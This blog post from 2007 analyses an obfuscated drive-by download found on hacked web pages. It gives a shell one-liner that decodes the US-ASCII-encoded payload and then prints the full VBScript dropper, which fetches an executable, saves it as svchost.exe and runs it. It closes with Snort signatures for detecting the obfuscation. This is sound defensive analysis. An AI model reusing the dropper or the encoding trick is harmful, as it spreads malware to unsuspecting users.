Javascript payload

Following on from the ISC Super Bowl Infection - More Sites blog. I did some investigation into the techniques used.

As explained in the ISC blogs, some javascript code is loaded from a hacked webpage which opens another payload through an Iframe. This payload has been encoded in order to evade web protections software using an “US-ASCII Exploit“. The tools, written in June 2006, add the hexadecimal value “0×80″ to each letter. The following script will help to decode the payload:

curl -s http://www.example.com/payload.htm | \ sed '/< .*>/d’ | \ hexdump | \ sed ’s/^.\{7\}//;s/ //g;’ | \ tr ‘\n’ ‘ ‘| sed ’s/ //g’ | \ perl -pe ’s/([0-9A-Z]{2})([0-9A-Z]{2})/$a=chr(hex($2)-hex(80));$a.=chr(hex($1)-hex(80));/ieg;’

The output of this command is:

<html> <script language=”VBScript”> on error resume next OOOOOOOOOOOOOwwwwwww = “http://www.example.com/acp/www.exe” Set eeeeeeeeeeeennnnnnnnnnn = document.createElement(”obj”&”ect”) eeeeeeeeeeeennnnnnnnnnn.setAttribute “classid”, “clsid:BD96C55″&”6-65A3-11D0-983″&”A-00C04FC”&”29E36″ str=”Micro”&”soft”&”.XMLH”&”TTP” Set x = eeeeeeeeeeeennnnnnnnnnn.CreateObject(str,”") set S = eeeeeeeeeeeennnnnnnnnnn.createobject(”Ad”&”odb.S”&”tr”&”eam”,”") S.type = 1 x.Open “GET”, OOOOOOOOOOOOOwwwwwww, False x.Send set F = eeeeeeeeeeeennnnnnnnnnn.createobject(”Scrip”&”ting.F”&”ileS”&”ystemObject”,”") set tmp = F.GetSpecialFolder(2) fname1= F.BuildPath(tmp,”svchost.exe”) S.open S.write x.responseBody S.savetofile fname1,2 set Q = eeeeeeeeeeeennnnnnnnnnn.createobject(”Shell.App”&”licat”&”ion”,”") Q.ShellExecute fname1,”",”",”o”&”pe”&”n”,0 S.close </script> Wide character in print at -e line 1, <> line 1. </html>
Once the payload is downloaded, it will be copied to a temporary directory as “svchost.exe” and then executed.
When this finished, I began to analyse the payload:

lynx http://www.example.com/acp/www.exe --mime_header
HTTP/1.0 502 Bad Gateway Server: Microsoft-IIS/5.0 Date: Tue, 06 Feb 2007 10:53:58 GMT Content-Length: 215 Content-Type: text/html Age: 249

<head><title>Error in CGI Application</title></head> <body><h1>CGI Error</h1>The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:<p></p><p><pre><

Any idea of what’s happening here?

Instead of downloading “www.exe” file, the server has been configured to execute the payload as a server side script (CGI). The script will be run as many times as people browse pages containing this payload. The file can not therefore be downloaded and copied … How sad !
Thus said it is also telling us that the bad guy didn’t test his payload, or that this payload was automatically installed.

Once finishing the analysis of the payload investigation, I’ve created some snort signatures to detect it:

# bc d3 c3 d2 c9 d0 d4 <SCRIPT # bc f3 e3 f2 e9 f0 f4 <script alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( \ msg:"BLEEDING-EDGE US-ASCII Obfuscated script"; flow:established,from_server; \ pcre:"/\xbc[\xf3\xd3][\xe3\xc3][\xf2\xd2][\xe9\xc9][\xf0\xd0][\xf4\xd4]/”; pcre:”/US-ASCII/i”; \ reference:url,www.internetdefence.net/2007/02/06/Javascript-payload/; \ reference:cve,2006-3227; reference:url,www.securityfocus.com/archive/1/437948/30/0/threaded; \ classtype:web-application-attack;sid:200702061;rev:1;)

# ae ef f0 e5 ee a0 a2 e7 e5 f4 a2 .open "get" # ae cf d0 c5 ce a0 a2 c7 c5 d4 a2 .OPEN "GET" ALERT tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( \ msg:"BLEEDING-EDGE US-ASCII Obfuscated VBScript download file"; flow:established,from_server; \ pcre:"/\xae[\xef\xcf][\xf0\xd0][\xe5\xc5][\xee\xce]\xa0\xa2[\xe7\xc7][\xe5\xc5][\xf4\xd4]\xa2/”; pcre:”/US-ASCII/i”; \ reference:url,www.internetdefence.net/2007/02/06/Javascript-payload/;reference:cve,2006-3227; \ reference:url,www.securityfocus.com/archive/1/437948/30/0/threaded; classtype:web-application-attack;sid:200702062;rev:1;)

# f3 e8 e5 ec ec e5 f8 e5 e3 f5 f4 e5 shellexecute # d3 c8 c5 cc cc c5 d8 c5 c3 d5 d4 c5 ALERT tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( \ msg:"BLEEDING-EDGE US-ASCII Obfuscated VBScript execute command"; flow:established,from_server; \ pcre:"/[\xf3\xd3][\xe8\xc8][\xe5\xc5][\xec\xcc][\xec\xcc][\xe5\xc5][\xf8\xd8][\xe5\xc5][\xe3\xc3][\xf5\xd5][\xf4\xd4][\xe5\xc5]/”; \ pcre:”/US-ASCII/i”; reference:url,www.internetdefence.net/2007/02/06/Javascript-payload/;reference:cve,2006-3227; \ reference:url,www.securityfocus.com/archive/1/437948/30/0/threaded; classtype:web-application-attack;sid:200702063;rev:1;)

# f6 e2 f3 e3 f2 e9 f0 f4 # d6 c2 d3 c3 d2 c9 d0 d4 VBSCRIPT alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (\ msg:"BLEEDING-EDGE US-ASCII Obfuscated VBScript"; flow:established,from_server; \ pcre:"/[\xf6\xd6][\xe2\xc2][\xf3\xd3][\xe3\xc3][\xf2\xd2][\xe9\xc9][\xf0\xd0][\xf4\xd4]/”; pcre:”/US-ASCII/i”; \ reference:url,www.internetdefence.net/2007/02/06/Javascript-payload/;reference:cve,2006-3227; \ reference:url,www.securityfocus.com/archive/1/437948/30/0/threaded; classtype:web-application-attack;sid:200702064;rev:1;)

This entry was posted on Tuesday, February 6th, 2007 at 4:51 pm and is filed under Vulnerabilities. You can follow any responses to this entry through the RSS 2.0 feed. Both comments and pings are currently closed.

Comments are closed.

Categories

Articles

Pages

Archives

Search

Links

Javascript payload



Categories E-Mail 419 Scams Phishing Spam Viruses General Daily Review Services Top Tips Security Threats Vulnerabilities XSS 2.0 Articles 06/04 April Report 06/05 May Report 06/06 June Report Email activity in June 06/07 July Report Email Activity in July ECSC Ltd. FireHat Internet Defence The Phishery Pages 419 Scam Archives October 2007 September 2007 August 2007 May 2007 February 2007 January 2007 December 2006 November 2006 October 2006 September 2006 August 2006 July 2006 June 2006 May 2006 April 2006 March 2006 February 2006 January 2006 December 2005 November 2005 August 2005 June 2005 March 2005 July 2004 June 2004 Search Links 06/04 April Report 06/05 May Report 06/06 June Report Email activity in June 06/07 July Report Email Activity in July ECSC Ltd. FireHat Internet Defence The Phishery	« Email activity in January: Spams, Viruses and Phishing Lazy Security Checks » Javascript payload Following on from the ISC Super Bowl Infection - More Sites blog. I did some investigation into the techniques used. As explained in the ISC blogs, some javascript code is loaded from a hacked webpage which opens another payload through an Iframe. This payload has been encoded in order to evade web protections software using an “US-ASCII Exploit“. The tools, written in June 2006, add the hexadecimal value “0×80″ to each letter. The following script will help to decode the payload: `curl -s http://www.example.com/payload.htm \| \ sed '/< .>/d’ \| \ hexdump \| \ sed ’s/^.\{7\}//;s/ //g;’ \| \ tr ‘\n’ ‘ ‘\| sed ’s/ //g’ \| \ perl -pe ’s/([0-9A-Z]{2})([0-9A-Z]{2})/$a=chr(hex($2)-hex(80));$a.=chr(hex($1)-hex(80));/ieg;’` The output of this command is: <html> <script language=”VBScript”> on error resume next OOOOOOOOOOOOOwwwwwww = “http://www.example.com/acp/www.exe” Set eeeeeeeeeeeennnnnnnnnnn = document.createElement(”obj”&”ect”) eeeeeeeeeeeennnnnnnnnnn.setAttribute “classid”, “clsid:BD96C55″&”6-65A3-11D0-983″&”A-00C04FC”&”29E36″ str=”Micro”&”soft”&”.XMLH”&”TTP” Set x = eeeeeeeeeeeennnnnnnnnnn.CreateObject(str,”") set S = eeeeeeeeeeeennnnnnnnnnn.createobject(”Ad”&”odb.S”&”tr”&”eam”,”") S.type = 1 x.Open “GET”, OOOOOOOOOOOOOwwwwwww, False x.Send set F = eeeeeeeeeeeennnnnnnnnnn.createobject(”Scrip”&”ting.F”&”ileS”&”ystemObject”,”") set tmp = F.GetSpecialFolder(2) fname1= F.BuildPath(tmp,”svchost.exe”) S.open S.write x.responseBody S.savetofile fname1,2 set Q = eeeeeeeeeeeennnnnnnnnnn.createobject(”Shell.App”&”licat”&”ion”,”") Q.ShellExecute fname1,”",”",”o”&”pe”&”n”,0 S.close </script> Wide character in print at -e line 1, <> line 1. </html> Once the payload is downloaded, it will be copied to a temporary directory as “svchost.exe” and then executed. When this finished, I began to analyse the payload: `lynx http://www.example.com/acp/www.exe --mime_header` `HTTP/1.0 502 Bad Gateway Server: Microsoft-IIS/5.0 Date: Tue, 06 Feb 2007 10:53:58 GMT Content-Length: 215 Content-Type: text/html Age: 249` `<head><title>Error in CGI Application</title></head> <body><h1>CGI Error</h1>The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:<p></p><p><pre><` Any idea of what’s happening here?* Instead of downloading “www.exe” file, the server has been configured to execute the payload as a server side script (CGI). The script will be run as many times as people browse pages containing this payload. The file can not therefore be downloaded and copied … How sad ! Thus said it is also telling us that the bad guy didn’t test his payload, or that this payload was automatically installed. Once finishing the analysis of the payload investigation, I’ve created some snort signatures to detect it: # bc d3 c3 d2 c9 d0 d4 <SCRIPT # bc f3 e3 f2 e9 f0 f4 <script alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( \ msg:"BLEEDING-EDGE US-ASCII Obfuscated script"; flow:established,from_server; \ pcre:"/\xbc[\xf3\xd3][\xe3\xc3][\xf2\xd2][\xe9\xc9][\xf0\xd0][\xf4\xd4]/”; pcre:”/US-ASCII/i”; \ reference:url,www.internetdefence.net/2007/02/06/Javascript-payload/; \ reference:cve,2006-3227; reference:url,www.securityfocus.com/archive/1/437948/30/0/threaded; \ classtype:web-application-attack;sid:200702061;rev:1;) # ae ef f0 e5 ee a0 a2 e7 e5 f4 a2 .open "get" # ae cf d0 c5 ce a0 a2 c7 c5 d4 a2 .OPEN "GET" ALERT tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( \ msg:"BLEEDING-EDGE US-ASCII Obfuscated VBScript download file"; flow:established,from_server; \ pcre:"/\xae[\xef\xcf][\xf0\xd0][\xe5\xc5][\xee\xce]\xa0\xa2[\xe7\xc7][\xe5\xc5][\xf4\xd4]\xa2/”; pcre:”/US-ASCII/i”; \ reference:url,www.internetdefence.net/2007/02/06/Javascript-payload/;reference:cve,2006-3227; \ reference:url,www.securityfocus.com/archive/1/437948/30/0/threaded; classtype:web-application-attack;sid:200702062;rev:1;) # f3 e8 e5 ec ec e5 f8 e5 e3 f5 f4 e5 shellexecute # d3 c8 c5 cc cc c5 d8 c5 c3 d5 d4 c5 ALERT tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( \ msg:"BLEEDING-EDGE US-ASCII Obfuscated VBScript execute command"; flow:established,from_server; \ pcre:"/[\xf3\xd3][\xe8\xc8][\xe5\xc5][\xec\xcc][\xec\xcc][\xe5\xc5][\xf8\xd8][\xe5\xc5][\xe3\xc3][\xf5\xd5][\xf4\xd4][\xe5\xc5]/”; \ pcre:”/US-ASCII/i”; reference:url,www.internetdefence.net/2007/02/06/Javascript-payload/;reference:cve,2006-3227; \ reference:url,www.securityfocus.com/archive/1/437948/30/0/threaded; classtype:web-application-attack;sid:200702063;rev:1;) # f6 e2 f3 e3 f2 e9 f0 f4 # d6 c2 d3 c3 d2 c9 d0 d4 VBSCRIPT alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (\ msg:"BLEEDING-EDGE US-ASCII Obfuscated VBScript"; flow:established,from_server; \ pcre:"/[\xf6\xd6][\xe2\xc2][\xf3\xd3][\xe3\xc3][\xf2\xd2][\xe9\xc9][\xf0\xd0][\xf4\xd4]/”; pcre:”/US-ASCII/i”; \ reference:url,www.internetdefence.net/2007/02/06/Javascript-payload/;reference:cve,2006-3227; \ reference:url,www.securityfocus.com/archive/1/437948/30/0/threaded; classtype:web-application-attack;sid:200702064;rev:1;) This entry was posted on Tuesday, February 6th, 2007 at 4:51 pm and is filed under Vulnerabilities. You can follow any responses to this entry through the RSS 2.0 feed. Both comments and pings are currently closed. Comments are closed.